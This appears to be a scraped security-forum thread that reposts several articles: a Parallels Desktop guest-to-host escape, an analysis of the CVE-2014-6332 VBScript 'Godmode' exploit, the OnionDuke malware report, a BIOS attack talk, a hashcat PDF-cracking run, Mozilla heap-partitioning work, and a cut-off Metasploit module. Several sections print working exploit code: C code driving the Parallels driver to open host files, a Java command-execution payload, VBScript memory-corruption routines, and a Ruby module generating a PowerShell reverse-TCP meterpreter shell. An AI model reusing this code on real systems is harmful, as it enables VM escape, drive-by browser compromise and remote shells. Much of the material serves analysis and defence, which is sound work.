file system sharing, you'll say, what could possibly go wrong? Unfortunately, a lot. After enabling this option you also can notice, that in context menu of Windows Explorer presents a very interesting "Open on Mac" shortcut: Looks promising, right? Technically this option asking the piece of Parallels software that working on the host side to do the thing, that equivalent to double-clicking on a target file in Finder. Guest-side part of this option is implemented as PrlToolsShellExt.dll shell extension (MD5 sum of DLL with version 10.1.1.28614 on my Windows 8.1 x64 guest is 97D15FB584C589FA297434E08CD0252F). Menu item click handler is located at function sub_180005834() and after some pre-processing of input values it sends IOCTL request to the device \Device\prl_tg that aims to one of the Paralles kernel mode drivers (prl_tg.sys): After the breakpoint on this DeviceIoControl() call we will obtain a call stack backatrace and function arguments: 0:037> k L7 Child-SP RetAddr Call Site 00000000`12bcd1c0 00007ff9`2a016969 PrlToolsShellExt!DllUnregisterServer+0x1596 00000000`12bcd310 00007ff9`2a01fd71 SHELL32!Ordinal93+0x225 00000000`12bcd410 00007ff9`2a4cf03a SHELL32!SHCreateDefaultContextMenu+0x581 00000000`12bcd780 00007ff9`2a4cc4b1 SHELL32!Ordinal927+0x156c2 00000000`12bcdaf0 00007ff9`2a4c76f7 SHELL32!Ordinal927+0x12b39 00000000`12bcded0 00007ff9`21d09944 SHELL32!Ordinal927+0xdd7f 00000000`12bcdf20 00007ff9`21d059d3 explorerframe!UIItemsView::ShowContextMenu+0x298 First 4 arguments of the DeviceIoControl(), rcx - device handle, r8 - input buffer, r9 - buffer length: 0:037> r rax=0000000012bcd240 rbx=0000000000000000 rcx=0000000000000d74 rdx=000000000022a004 rsi=0000000000000001 rdi=0000000000000070 rip=00007ff918bd5b92 rsp=0000000012bcd1c0 rbp=000000000022a004 r8=0000000012bcd240 r9=0000000000000070 r10=000000001a5bc990 r11=000000001a5bd110 r12=0000000000000002 r13=0000000012bcd490 r14=0000000012bcd4a0 r15=0000000016af90f0 Last 4 arguments of the DeviceIoControl() that was passed over the stack: 0:037> dq rsp L4 00000000`12bcd1c0 00000000`00000000 00000000`02bdc218 00000000`12bcd1d0 00000000`00000001 00000000`00ce2480 IOCTL request input buffer: 0:037> dq @r8 00000000`12bcd240 ffffffff`00008321 00000000`00010050 00000000`12bcd250 00000000`00000001 00000000`00000002 00000000`12bcd260 00000000`00000002 00000000`00000000 00000000`12bcd270 00000000`00000000 00000000`00000000 00000000`12bcd280 00000000`00000000 00000000`00000000 00000000`12bcd290 00000000`00000000 00000000`00000000 00000000`12bcd2a0 00000000`02c787d0 00000000`0000003c It consists from several magic values and pointer to the ASCII string with the target file path at 0x60 offset: 0:037> da poi(@r8+60) 00000000`02c787d0 "\\psf\TC\dev\_exploits\prl_guet_" 00000000`02c787f0 "to_host\New Text Document.txt" After sending this IOCTL control request to the driver, specified file will be opened at the host side. It's also interesting and useful, that this action can be triggered from Windows user account with any privileges (including Guest): [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]\Device\prl_tg security permissions[/TD] [/TR] [/TABLE] And because the target file will be opened at the host side with privileges of the current OS X user, it seems that "Access Windows folder from Mac" option is definitely breaks a security model that you're usually expecting from guest-host interaction. Exploiting The following function was implemented after the short reverse engineering of shell extension. It interacting with the Parallels kernel driver and executing specified file at the host side: void OpenFileAtTheHostSide(char *lpszFilePath){ HANDLE hDev = NULL; // get handle to the target device if (OpenDevice(L"\\Device\\prl_tg", &hDev)) { PDWORD64 RequestData = (PDWORD64)LocalAlloc(LMEM_FIXED, 0x70); if (RequestData) { IO_STATUS_BLOCK StatusBlock; ZeroMemory(RequestData, 0x70); /* Fill IOCTL request input buffer. It has the same layout on x86 and x64 versions of Windows */ RequestData[0x0] = 0xffffffff00008321; // magic values RequestData[0x1] = 0x0000000000010050; RequestData[0x2] = 0x0000000000000001; RequestData[0x3] = 0x0000000000000002; RequestData[0x4] = 0x0000000000000002; RequestData[0xc] = (DWORD64)lpszFilePath; // file path and it's length RequestData[0xd] = (DWORD64)strlen(lpszFilePath) + 1; NTSTATUS ns = NtDeviceIoControlFile( hDev, NULL, NULL, NULL, &StatusBlock, 0x22a004, // IOCTL code RequestData, 0x70, RequestData, 0x70 ); DbgMsg(__FILE__, __LINE__, "Device I/O control request status is 0x%.8x\n", ns); // ... M_FREE(RequestData); } CloseHandle(hDev); } } Now let's write some payload. Unfortunately, we can't execute a shell script or AppleScript file in this way because such files will be opened in a text editor. But there's still a lot of other evil things that attacker can do with the ability of arbitrary file opening. For example, it's possible to write a Java .class that executes specified command and saves it's output to the guest file system (that usually mounted at /Volumes/<windows_letter>): public static void main(String[] args) { // exeute command and get it's output StringBuilder output = new StringBuilder(); if (exec(defaultCmd, output) == -1) { output.append("Error while executing command"); } String volumesPath = "/Volumes"; File folder = new File(volumesPath); // enumerate mounted volumes of Parallels guests for (File file : folder.listFiles()) { if (file.isDirectory()) { // try to save command output into the temp String outFile = volumesPath + "/" + file.getName() + "/Windows/Temp/prl_host_out.txt"; try { write(outFile, output.toString()); } catch (IOException e) { continue; } } } } Using this .class and OpenFileAtTheHostSide() function we can implement a usable command execution exploit: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of commands using PoC[/TD] [/TR] [/TABLE] Full exploit code is available at GitHub: https://github.com/Cr4sh/prl_guest_to_host Protection from this attack is pretty simple: disabling "Access Windows folder from Mac" option in virtual machine settings prevents the ability of opening files from the guest systems. Also, you can enable "Isolate Windows from Mac" option that disables (in theory) all of the virtual machine sharing features: TL;DR It can be rather an incomplete documentation issue than vulnerability. It's absolutely not obvious for user, that guest file system sharing can lead to arbitrary code execution at the host side. Exploit is very simple and reliable, works under all of the versions of Windows on guest machines, attack can be performed with the privileges of any Windows user that belongs to the Everyone security group. This issue is also relevant to other guest operating systems (like Linux and OS X), however, provided PoC was designed only for Windows. It will be good to disable sharing options of virtual machines, if such attack vector might be a critical for your threat model. I think that It's very unlikely that Parallels will release any significant fixes or improvements for described mechanisms, because any reasonable fix will break the easy way of opening Windows documents on Mac. I played a bit with only one sharing option, but who knows now many similar (or even worse) security issues are actually exists in Parallels, VMware and Oracle products. PS: Have a good fun at ZeroNights, too bad that this year I'm missing it. Posted by ?r4sh Sursa: My aimful life: Simple guest to host VM escape for Parallels Desktop
  10. Nytro

    Tricou RST

    Deci, pareri, sugestii? Cine mai vrea?
  11. Si, in ce stadiu e proiectul?
  12. Bypassing Address Space Layout Randomization Toby ’TheXero’ Reynolds April 15, 2012 Contents Introduction Method 1 - Partial overwrite Method 2 - Non ASLR Method 3 - Brute force Conclusion Download: http://nullsecurity.net/papers/nullsec-bypass-aslr.pdf
  13. A Killer Combo: Critical Vulnerability and ‘Godmode’ Exploitation on CVE-2014-6332 by Weimin Wu (Threat Analyst) Microsoft released 16 security updates during its Patch Tuesday release for November 2014, among which includes CVE-2014-6332, or the Windows OLE Automation Array Remote Code Execution Vulnerability (covered in MS14-064). We would like to bring attention to this particular vulnerability for the following reasons: It impacts almost all Microsoft Windows versions from Windows 95 onward. A stable exploit exists and works in versions of Internet Explorer from 3 to 11, and can bypass operating system (OS) security utilities and protection such as Enhanced Mitigation Experience Toolkit (EMET), Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR),and Control-Flow Integrity (CFI). Proof of concept (PoC) exploit code has recently been published by a Chinese researcher named Yuange1975. Based on the PoC, it’s fairly simple to write malicious VBScript code for attacks. Attackers may soon utilize the PoC to target unpatched systems. About the CVE-2014-6332 Vulnerability The bug is caused by improper handling resizing an array in the Internet Explorer VBScript engine. VBScript is the default scripting language in ASP (Active Server Pages). Other browsers like Google Chrome do not support VBScript, but Internet Explorer still supports it via a legacy engine to ensure backward compatibility. An array has the following structure in the VBScript engine: typedef struct tagSAFEARRAY { USHORT cDims; USHORT fFeatures; ULONG cbElements; ULONG cLocks; PVOID pvData; SAFEARRAYBOUND rgsabound[ 1 ]; } SAFEARRAY; typedef struct tagSAFEARRAYBOUND { ULONG cElements; LONG lLbound; } SAFEARRAYBOUND; pvData is a pointer to address of the array, and rgsabound [0].cElements stands for the numbers of elements in the array. Each element is a structure Var, whose size is 0×10: Var { 0×00: varType 0×04: padding 0×08: dataHigh 0x0c: dataLow } A bug may occur upon redefining an array with new length in VBScript, such as: redim aa(a0) … redim Preserve aa(a1) VBScript engine will call function OLEAUT32!SafeArrayRedim(), whose arguments are: First: ppsaOUT //the safeArray address Second: psaboundNew //the address of SAFEARRAY, which contains the new //number of elements: arg_newElementsSize Figure 1. Code of function SafeArrayRedim() The function SafeArrayRedim() does the following steps: Get the size of old array: oldSize= arg_pSafeArray-> cbElements*0×10 Set the new number to the array: arg_pSafeArray-> rgsabound[0].cElements = arg_newElementsSize Get the size of new array: newSize = arg_newElementsSize*0×10 Get the difference: sub = newSize – oldSize If sub > 0, goto bigger_alloc (this branch has no problem) If sub < 0, goto less_alloc to reallocate memory by function ole32!CRetailMalloc_Realloc() In this case, go this branch. Though sub > 0×8000000 as unsigned integer, sub is treated as negative value here because opcode jge works on signed integer. Here is the problem: integer overflow (singed/unsigned) cElements is used as unsigned integer; oldsize, newsize, sub is used as unsigned integer sub is treated as signed integer in opcode jge comparision The Dangerous PoC Exploit This critical vulnerability can be triggered in a simple way. For VBScript engine, there is a magic exploitation method called “Godmode”. With “Godmode,” arbitrary code written in VBScript can break the browser sandbox. Attackers do not need to write shellcode and ROP; DEP and ALSR protection is naturally useless here. Because we can do almost everything by VBScript in “Godmode,” a file infector payload is not necessary in this situation. This makes it easy to evade the detections on heap spray, Return Oriented Programming (ROP), shellcode, or a file infector payload. Next, we’ll see how the reliable the existing PoC is. Exploiting the vulnerability Firstl, the exploit PoC does type confusion using this vulnerability. It defines two arrays: aa and ab, and then resizes aa with a huge number. a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) Because the type of arrays aa and ab are same, and the elements number is equal, it’s possible to have the array memory layout as following: Figure 2. Expected memory layout of array aa, ab When redim Preserve aa(a2)” ,a2 = a0+&h8000000, is run, it may trigger the vulnerability. If that happens, the out-of-bound elements of aa are accessible. The PoC then uses it to do type confusion on element of ab. But the memory layout does not always meet the expectation, and the bug may not be triggered every time. So the PoC tries many times to meet the following condition: The address of ab(b0) is a pointer to the type field (naturally, b0=0 here) The address of aa(a0) is a pointer to the data high field of ab(b0) Which means: address( aa(a0)) is equal to address( ab(b0)) + 8 Figure 3. Memory layout the conditions meet Then, modifying the ab(b0) data high field equals to modifying the aa(a0) type field — typeconfusion. Secondly, the PoC makes any memory readable by the type confusion. Function readmem(add) On Error Resume Next ab(b0)=0 // type of aa(a0) is changed to int aa(a0)=add+4 // the high data of aa(a0) is set to add+4 ab(b0)=1.69759663316747E-313 // thisis 0×0000000800000008 // now, type of aa(a0) is changed to bstr readmem=lenb(aa(a0)) // length of bstr stores in pBstrBase-4 // lenb(aa(a0)) = [pBstrBase-4] = [add+4-4] ab(b0)=0 end function The abovementioned function can return any [add], which is used to enter “Godmode.” Enter “Godmode” We know that VBScript can be used in browsers or the local shell. When used in the browser, its behavior is restricted, but the restriction is controlled by some flags. That means, if the flags are modified, VBScript in HTML can do everything as in the local shell. That way, attackers can write malicious code in VBScript easily, which is known as “Godmode.” The following function in the PoC exploit is used to enter “Godmode”. The said flags exists in the object COleScript. If the address of COleScript is retrieved, the flags can be modified. function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) // get address of CScriptEntryPoint which includes pointer to COleScript i=readmemo(i+16) // get address of COleScript which includes pointer the said safemode flags j=readmemo(i+&h134) for k=0 to &h60 step 4 // for compatibility of different IE versions j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) // change safemode flags redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function Here, function mydata() can return a variable of function object, which includes a pointer to CScriptEntryPoint. Then we raise a question: If the address of a function object is not accessible using VBScript, how does the PoC make it? The following function shows a smart trick in this PoC: function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function The key is in the first three lines of the function: i=testaa We know that we cannot get the address of a function object in VBScript. This code seems to be nonsense. However, let’s see the call stack when executing it. Before the above line, the stack is empty. First, the VM translates testaa as a function, and puts its address into the stack. Second, VM translates the address of i, and tries assignment operation. However, the VM finds that the type in stack is function object. So it returns an error and enter error handling. Because “On Error Resume Next” is set in the function mydata(), VM will continue the next sentence even when the error occurs. i=null For this line, VM translates “null” first. For “null”, VM will not put a data into stack. Instead, it only changes the type of the last data in stack to 0×1!! Then VM assigns it to i, — that’s just the address of function testaa(), though the type of i is VT_NULL. The abovementioned lines are used to leak the address of function testaa() from a VT_NULL type. Conclusion The “Godmode” of legacy VBScript engine is the most dangerous risk in Internet Explorer. If a suitable vulnerability is found, attackers can develop stable exploits within small effort. CVE-2014-6322 is just one of vulnerabilities the most easily to do that. Fortunately, Microsoft has released patch for that particular CVE, but we still expect Microsoft to provide direct fix for “Godmode,” in the same way Chrome abandoned support for VBScript. In addition, this vulnerability is fairly simple to exploit and to bypass all protection to enter into VBScript GodMode(), which in turn can make attackers ‘super user’ thus having full control on the system. Attackers do not necessarily need shellcode to compromise their targets. The scope of affected Windows versions is very broad, with many affected versions (such as Windows 95 and WIndows XP) no longer supported. This raises the risk for these older OSes in particular, as they are vulnerable to exploits. This vulnerability is very rare since it affects almost OS versions, and at the same time the exploit is advanced that it bypasses all Microsoft protections including DEP, ASLR, EMET, and CFI. With this killer combination of advanced exploitation technique and wide arrayed of affected platforms, there’s a high possibility that attackers may leverage this in their future attacks. Solutions and Recommendations We highly recommend users to implement the following best practices: Install Microsoft patches immediately. Using any other browser aside from Internet Explorer before patching may also mitigate the risks. We advise users also to employ newer versions of Windows platforms that are supported by Microsoft. Trend Micro™ Deep Security and Vulnerability Protection, part of our Smart Protection Suites, are our recommended solutions for enterprises to defend their systems against these types of attacks. Trend Micro Deep Security and Office Scan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage this vulnerability via the following DPI rules: 1006324 – Windows OLE Automation Array Remote Code Execution Vulnerability (CVE-2014-6332) 1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability 1006291 – Microsoft Windows OLE Remote Code Execution Vulnerability -1 For more information on the support for all vulnerabilities disclosed in this month’s Patch Tuesday, go to our Threat Encyclopedia page. Sursa: A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332
  14. OnionDuke: APT Attacks Via the Tor Network Recently, research was published identifying a Tor exit node, located in Russia, that was consistently and maliciously modifying any uncompressed Windows executables downloaded through it. Naturally this piqued our interest, so we decided to peer down the rabbit hole. Suffice to say, the hole was a lot deeper than we expected! In fact, it went all the way back to the notorious Russian APT family MiniDuke, known to have been used in targeted attacks against NATO and European government agencies. The malware used in this case is, however, not a version of MiniDuke. It is instead a separate, distinct family of malware that we have since taken to calling OnionDuke. But lets start from the beginning. When a user attempts to download an executable via the malicious Tor exit node, what they actually receive is an executable "wrapper" that embeds both the original executable and a second, malicious executable. By using a separate wrapper, the malicious actors are able to bypass any integrity checks the original binary might contain. Upon execution, the wrapper will proceed to write to disk and execute the original executable, thereby tricking the user into believing that everything went fine. However, the wrapper will also write to disk and execute the second executable. In all the cases we have observed, this malicious executable has been the same binary (SHA1: a75995f94854dea8799650a2f4a97980b71199d2, detected as Trojan-Dropper:W32/OnionDuke.A). This executable is a dropper containing a PE resource that pretends to be an embedded GIF image file. In reality, the resource is actually an encrypted dynamically linked library (DLL) file. The dropper will proceed to decrypt this DLL, write it to disk and execute it. A flowchart of the infection process Once executed, the DLL file (SHA1: b491c14d8cfb48636f6095b7b16555e9a575d57f, detected as Backdoor:W32/OnionDuke.B) will decrypt an embedded configuration (shown below) and attempt to connect to hardcoded C&C URLs specified in the configuration data. From these C&Cs the malware may receive instructions to download and execute additional malicious components. It should be noted, that we believe all five domains contacted by the malware are innocent websites compromised by the malware operators, not dedicated malicious servers. A screenshot of the embedded configuration data Through our research, we have also been able to identify multiple other components of the OnionDuke malware family. We have, for instance, observed components dedicated to stealing login credentials from the victim machine and components dedicated to gathering further information on the compromised system like the presence of antivirus software or a firewall. Some of these components have been observed being downloaded and executed by the original backdoor process but for other components, we have yet to identify the infection vector. Most of these components don't embed their own C&C information but rather communicate with their controllers through the original backdoor process. One component, however, is an interesting exception. This DLL file (SHA1 d433f281cf56015941a1c2cb87066ca62ea1db37, detected as Backdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com and also evidence suggesting that this component may abuse Twitter as an additional C&C channel. What makes the overpict.com domain interesting, is it was originally registered in 2011 with the alias of "John Kasai". Within a two-week window, "John Kasai" also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke. This strongly suggests that although OnionDuke and MiniDuke are two separate families of malware, the actors behind them are connected through the use of shared infrastructure. A visualization of the infrastructure shared between OnionDuke and MiniDuke Based on compilation timestamps and discovery dates of samples we have observed, we believe the OnionDuke operators have been infecting downloaded executables at least since the end of October 2013. We also have evidence suggesting that, at least since February of 2014, OnionDuke has not only been spread by modifying downloaded executables but also by infecting executables in .torrent files containing pirated software. However, it would seem that the OnionDuke family is much older, both based on older compilation timestamps and also on the fact that some of the embedded configuration data make reference to an apparent version number of 4 suggesting that at least three earlier versions of the family exist. During our research, we have also uncovered strong evidence suggesting that OnionDuke has been used in targeted attacks against European government agencies, although we have so far been unable to identify the infection vector(s). Interestingly, this would suggest two very different targeting strategies. On one hand is the "shooting a fly with a cannon" mass-infection strategy through modified binaries and, on the other, the more surgical targeting traditionally associated with APT operations. In any case, although much is still shrouded in mystery and speculation, one thing is certain. While using Tor may help you stay anonymous, it does at the same time paint a huge target on your back. It's never a good idea to download binaries via Tor (or anything else) without encryption. The problem with Tor is that you have no idea who is maintaining the exit node you are using and what their motives are. VPNs (such as our Freedome VPN) will encrypt your connection all the way through the Tor network, so the maintainers of Tor exit nodes will not see your traffic and can't tamper with it. Samples: • a75995f94854dea8799650a2f4a97980b71199d2 • b491c14d8cfb48636f6095b7b16555e9a575d57f • d433f281cf56015941a1c2cb87066ca62ea1db37 Detected as: Trojan-Dropper:W32/OnionDuke.A, Backdoor:W32/OnionDuke.A, and Backdoor:W32/OnionDuke.B. Post by — Artturi (@lehtior2) Sursa: OnionDuke: APT Attacks Via the Tor Network - F-Secure Weblog : News from the Lab
  15. BIOS and Secure Boot Attacks Uncovered Andrew Furtak, Yuriy Bulygin, Oleksandr Bazhaniuk, John Loucaides, Alexander Matrosov, Mikhail Gorobets Signed BIOS Updates Are Rare Mebromimalware includes BIOS infector & MBR bootkitcomponents •Patches BIOS ROM binary injecting malicious ISA Option ROM with legitimate BIOS image mod utility •Triggers SW SMI 0x29/0x2F to erase SPI flash then write patched BIOS binary No Signature Checks of OS boot loaders (MBR) •No concept of Secure or Verified Boot •Wonder why TDL4 and likes flourished? Slides: http://www.c7zero.info/stuff/BIOSandSecureBootAttacksUncovered_eko10.pdf
  16. Cracking password protected PDF documents We just started with the work on oclHashcat to support cracking of password protected PDF. There is 5-6 different versions but for PDF version 1.1 - 1.3, which uses RC4-40 (and we have a fast rc4 cracking kernel), we can already summarize: Guarantee to crack every password protected PDF of format v1.1 - v1.3 regardless of the password used All existing documents at once as there's no more salt involved after the key is computed In less than 4 hours (single GPU)!! Here's how the output looks like: root@et:~/oclHashcat-1.32# ./oclHashcat64.bin -w3 -m 10410 hash -a 3 ?b?b?b?b?b oclHashcat v1.32 starting... Device #1: Tahiti, 3022MB, 1000Mhz, 32MCU Device #2: Tahiti, 3022MB, 1000Mhz, 32MCU Device #3: Tahiti, 3022MB, 1000Mhz, 32MCU Hashes: 1 hashes; 1 unique digests, 1 unique salts Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes Applicable Optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt * Brute-Force Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 80c Device #1: Kernel ./amd/m10410_a3.cl (21164 bytes) Device #1: Kernel ./amd/markov_le_v1.cl (9208 bytes) Device #1: Kernel ./amd/bzero.cl (887 bytes) Device #2: Kernel ./amd/m10410_a3.cl (21164 bytes) Device #2: Kernel ./amd/markov_le_v1.cl (9208 bytes) Device #2: Kernel ./amd/bzero.cl (887 bytes) Device #3: Kernel ./amd/m10410_a3.cl (21164 bytes) Device #3: Kernel ./amd/markov_le_v1.cl (9208 bytes) Device #3: Kernel ./amd/bzero.cl (887 bytes) $pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170:$HEX[db34433720] Session.Name...: oclHashcat Status.........: Cracked Input.Mode.....: Mask (?b?b?b?b? [5] Hash.Target....: $pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170 Hash.Type......: PDF 1.3 (Acrobat 2, 3, 4) + collider-mode #1 Time.Started...: Fri Nov 7 16:05:44 2014 (19 mins, 42 secs) Speed.GPU.#1...: 85019.7 kH/s Speed.GPU.#2...: 85010.9 kH/s Speed.GPU.#3...: 84962.4 kH/s Speed.GPU.#*...: 255.0 MH/s Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.......: 301050363904/1099511627776 (27.38%) Skipped........: 0/301050363904 (0.00%) Rejected.......: 0/301050363904 (0.00%) HWMon.GPU.#1...: 99% Util, 38c Temp, 25% Fan HWMon.GPU.#2...: 99% Util, 39c Temp, 27% Fan HWMon.GPU.#3...: 99% Util, 38c Temp, 27% Fan Started: Fri Nov 7 16:05:44 2014 Stopped: Fri Nov 7 16:25:29 2014 Sursa: https://hashcat.net/forum/thread-3818.html
  17. Partitioned heap in Firefox, part 1 Published 15 Oct 2014 This post is meant to share some of the progress I’ve made in my current project at Mozilla, which I’ve been working on for about two months now. In short, the goal of this project is to use heap partitioning as a countermeasure for attacks based on use-after-free bugs, and in what follows, I’ll (briefly) go over what we’re trying to guard against, then proceed to explain what we’re planning to do about it. Use-after-free bugs and how they’re exploited Having very little security experience prior to taking this project, the first thing I did was spend a few days understanding how use-after-free bugs are exploited. As it turns out, they’re often an essential part of attacks against browsers, given how malicious Javascript code can get the browser engine to perform arbitrary allocations while being executed. In particular, if any script gets a chance to run after an object is freed, but before it is (mistakenly) used again, then that script could attempt to allocate, say, an ArrayBuffer in that free’d memory region. In a simplistic scenario, if that allocation succeeds – and, with a deterministic memory allocator, chances are it will succeed -, an attacker could overwrite the free’d object’s vtable to control the execution flow of the browser when a method of the compromised object is next invoked. While studying this, I found this description of a Firefox vulnerability found during Pwn2Own 2014 and this write-up on a WebKit exploit to be particularly useful. In the former, an ArrayBuffer is corrupted to leak some interesting memory addresses (thus bypassing Address Space Layout Randomization), which are then used to form a ROP payload that is entered after a jump is made to an address kept in memory that is used after being free’d. In the latter, a truly mindblowing sequence of steps is employed to overwrite the vtable of a free’d then used object. Heap partitioning as a countermeasure Attacks based on use-after-free bugs basically hinge on the predictability of the memory allocator: an attacker must be reasonably confident that triggering a memory allocation of the same size as a chunk of memory that was just free’d will cause the allocator to return that very same chunk. Thus, an effective way to counter these attacks is to partition the heap such that allocations that may be controlled by an attacker will never reuse memory that was previously allocated to internal browser objects. Specifically, Javascript objects that cause buffers to be allocated (and whose memory contents can be arbitrarily manipulated by an attacker), such as ArrayBuffers, should be allocated from an entirely separate memory pool than the rest of the browser engine. This approach has been implemented in other browsers tovarious extents, and Gecko already does partition a restricted set of objects, in addition to poisoning freed memory to help catch use-after-free bugs. However, despite being very effective, segregating entire classes of objects doesn’t come at no cost: there’s a very real risk of increasing memory fragmentation, and thus memory usage, which is something we’ve extensively tweaked in the past and care a lot about. A word on memory allocators After studying the available options, we came up with two alternatives for implementing heap partitioning – tweaking the existing allocator, or replacing it with Blink’s PartitionAlloc. Firefox currently uses an allocator dubbed mozjemalloc, a modified version of the jemalloc allocator. It is not too difficult to understand its inner workings by reading the code and stepping through some allocations with a debugger, but I also found a Phrack article about jemalloc to be a valuable resource. As a bonus, the article is written from an attacker’s perspective, which is good for “knowing-your-enemy” purposes. While it is not too hard to tweak mozjemalloc so it uses different partitions, we’re currently in the process of updating our allocator back to unmodified jemalloc (aka jemalloc3), so it’s more sensible to implement partitioning on top of jemalloc3 instead of mozjemalloc. Plus, jemalloc3 provides handy API calls that can be used for partitioning, which is less intrusive than what we’d need to do with mozjemalloc. PartitionAlloc (PA for short), on the other hand, is built from the ground up with partitioning in mind, and while it will certainly cause a lot more integration woes than jemalloc3, it’s definitely worth experimenting with. Given that it’s an off-the-shelf solution for partitioning, I haven’t bothered too much with understanding how it works yet, nor have I found any references about it aside from the code itself. Building up to the experiments After taking in all that new information, it became apparent that there was a lot of work to be done in both fronts – jemalloc3 and PA -, up until the milestone where we’d get some data to compare them and pick the winner. The JS engine folks advised me that the simplest way to get some experimental data for memory usage would be to not try to allocate specific objects in a separate partition, but rather to separate all engine allocations from the rest of the browser. Given that the buffers we’re interested in isolating account for most of the memory used by SpiderMonkey, this would give us a good approximation of the final results without having to worry too much about their hierarchy of memory functions. Thus, I spent the following weeks attempting to create two builds: one in which SpiderMonkey allocates from a separate jemalloc3 partition from the rest of Gecko, and another in which it allocates from PA, with jemalloc3 being used for the rest of Gecko. The latter may sound odd (that’s because it is), but it proved to be a lot easier than replacing the allocator for all of Gecko with PA, and I believe it is enough for comparison purposes. Additionally, I began working on the jemalloc3 transition by helping upstream some changes that had been made on mozjemalloc (bug 801536). As an interesting aside, the PA builds unveiled several violations of the JS engine API in which the memory allocators used by Gecko and SpiderMonkey were mixed (for instance, attempting to free from one of them memory that was allocated from the other), all over the code. I fixed all that I could find. Experiments We have a great tool for measuring Firefox’s memory footprint under realistic loads called Are We Slim Yet?, which I’ll refer to as AWSY for brevity. Once the necessary builds were ready, the next step was to run them through AWSY and see how they performed. [TABLE=class: img-wrap standout, width: 90%] [TR] [TD][/TD] [/TR] [TR] [TD=class: img-caption]— Columns, left to right: jemalloc3 with partition, mozjemalloc, jemalloc3 without partition, PartitionAlloc + jemalloc3 Frankenbuild[/TD] [/TR] [TR] [/TR] [/TABLE] The graph above shows RSS, the main metric we’re interested in – the amount of physical memory used by Firefox – in four different builds. From left to right: jemalloc3 with a separate partition for SpiderMonkey, an unmodified build using mozjemalloc, jemalloc3 without a separate partition, and jemalloc3 with PartitionAlloc for SpiderMonkey . The complete AWSY run has all the results, but it also shows pretty obviously that the in-browser memory accounting is broken with PartitionAlloc, so it’s best to constrain our analysis to RSS. Conclusions and next steps Despite the iffiness of the jemalloc3 + PartitionAlloc Frankenbuild, the experimental evidence shows that: 1. There’s no reason to expect PartitionAlloc’s memory footprint to be much better than jemalloc3’s 2. Partitioning jemalloc3 should introduce little additional memory overhead 3. jemalloc3 regresses significantly when compared with mozjemalloc Given the difficulty in integrating PartitionAlloc and conclusion 1 above, the takeaway is that the best way forward is to give up on PartitionAlloc for now and invest in jemalloc3, which we’re more than halfway through in transitioning to anyway. Of course, should our jemalloc3 solution prove insufficient for any reason, we now also have evidence that PartitionAlloc is a worthy contender in the future. Conclusion 2 gives us some confidence that going with jemalloc3 will not cause Firefox’s memory usage to skyrocket, but point 3, for which there is a known bug, is a bit more worrying, so I’ll investigate that next. Acknowledgements Special thanks to Daniel Veditz, Mike Hommey, Nicholas Nethercote, Terrence Cole, Steven Fink and John Schoenick for contributing to and guiding me through the various parts of these experiments. Sursa: might as well hack it | Partitioned heap in Firefox, part 1
  18. CVE-2014-6332: it’s raining shells This is a shared post by me (@wez3forsec) and Rik van Duijn (@rikvduijn) Today @yuange tweeted a proof of concept for CVE-2014-6223. CVE-2014-6332 is a critical Internet Explorer vulnerability that was patched with MS-14-064. The POC was able to execute the application notepad.exe. We wanted to pop some actual shells with this so now the race began to find a way of executing more than just notepad of calc. The “great” thing is this vulnerability affects Windows 95 IE 3.0 until Windows 10 IE 11 from a pentesters perspective this is awesome from a blue team perspective this will make you cry. CVE-2014-6332 alliedve.htm 404???? allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. — yuange @yuange75) 12 november 2014 We wanted to pop shells that’s why we created a Metasploit module, this allows us to adapt our exploit when needed and gives us the usability of the Metasploit framework. This gives the ability to start lots of different payloads supported by the Metasploit framework. To start the payloads, we decided to use Powershell. This has some advantages, Powershell is for example useful for bypassing anti-virus software, because it is able to inject payloads directly into memory. Next to this using newer versions of Windows we were unable to even run cmd.exe or other commands like ipconfig. Fun fact application whitelisting usually whitelists Powershell so use more Powershell! The original exploit runs the notepad.exe file in order to prove it was able to execute code. We modified this in order to execute the powershell.exe and inject a meterpreter into memory. First we modified the HTML page so its easy to handle within ruby, next we added the powershell.exe In order to see if it would actually execute. def on_request_uri(cli, request) payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true }) payl.slice! "powershell.exe " the above code generates a complete powershell one liner for a payload we are using a reverse_tcp meterpreter shell but it could use something else. function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 